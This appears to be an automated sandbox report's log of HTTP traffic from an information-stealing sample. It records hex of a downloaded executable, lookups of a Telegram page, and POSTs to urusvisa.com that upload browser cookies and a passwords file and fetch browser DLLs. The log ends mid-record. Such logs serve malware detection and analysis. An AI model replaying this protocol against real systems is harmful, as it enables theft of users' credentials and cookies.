Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:54 GMTContent-Type: application/octet-streamContent-Length: 380456Last-Modified: Mon, 30 Sep 2024 04:37:24 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2b04-5ce28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 05 00 00 08 00 00 00 00 00 00 4e bc 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 bc 05 00 4b 00 00 00 00 c0 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 a8 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c8 ba 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9c 05 00 00 20 00 00 00 9e 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 c0 05 00 00 06 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bc 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 aa 05 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 58 f1 31 35 d1 e9 51 1a 14 54 9d 77 7b a3 ef 8c 05 fa a9 ca 06 9a b3 9a d5 76 5e 00 22 df fa eb 06 53 a5 d7 8f ee b6 30 5a 6f bc ef 58 93 ac b7 96 f8 15 7c 83 a1 da 8c c7 f3 b1 bf 6f 88 94 d4 a0 41 53 b4 e8 44 a2 12 a6 6e f0 f4 45 0f 65 b6 f7 e2 35 5f f7 30 1b ba 95 ad ae 45 f9 84 06 03 41 aa 9a 85 ab b7 3b bb fa 01 0c 24 dc 33 a6 5a d8 ba 21 68 3b c7 25 16 bc 0f 0b 72 3b 47 0a 8c 75 18 13 f4 52 80 8b 07 24 27 b9 39 d0 b0 ce f2 c7 56 0b 8b 37 02 4f 3f 14 43 92 dd 3a fb 16 fd b4 7c e9 e5 cd 2c 60 32 76 71 85 32 74 be 58 2f 06 67 3d 5e 6e 28 14 ad dd b4 3f 25 4e 12 c8 d5 d4 67 c6 11 96 51 94 25 a2 25 e1 c9 af 49 72 6f 14 30 e1 06 88 48 09 66 d4 2e 77 2b 5e cf cc f7 63 c7 1d f7 69 9e d9 2f 86 27 c3 ae d5 e9 46 fb 7f fd a9 f0 1d c8 a2 cc 12 46 52 f1 45 fa 74 96 c1 05 9d 2b 76 9c 37 53 8d 67 aa ec 17 33 dc f6 ab 8e da 7d a5 28 c8 b8 c0 a7 48 a1 b2 ba 29 17 75 21 5f 35 fb b1 02 59 62 8e 0a 85 74 8

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------FCGIJDBAFCBAAKECGDGC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="mode"1------HIDHIEGIIIECAKEBFBAA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="mode"2------KKFCAAKFBAEHJJJJDHIE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="mode"21------HDBGHDHCGHCAAKEBKECB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBHost: urusvisa.comContent-Length: 7641Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGCHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 2d 2d 0d 0a Data Ascii: ------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="file_name"Q29va2llc
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: urusvisa.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="file_data"------CBAKEBGIIDAFIDHIIECF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: urusvisa.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="file_data"------BAKEBFBAKKFCBGDHDGHD--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: urusvisa.comContent-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="mode"3------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="mode"4------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: urusvisa.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 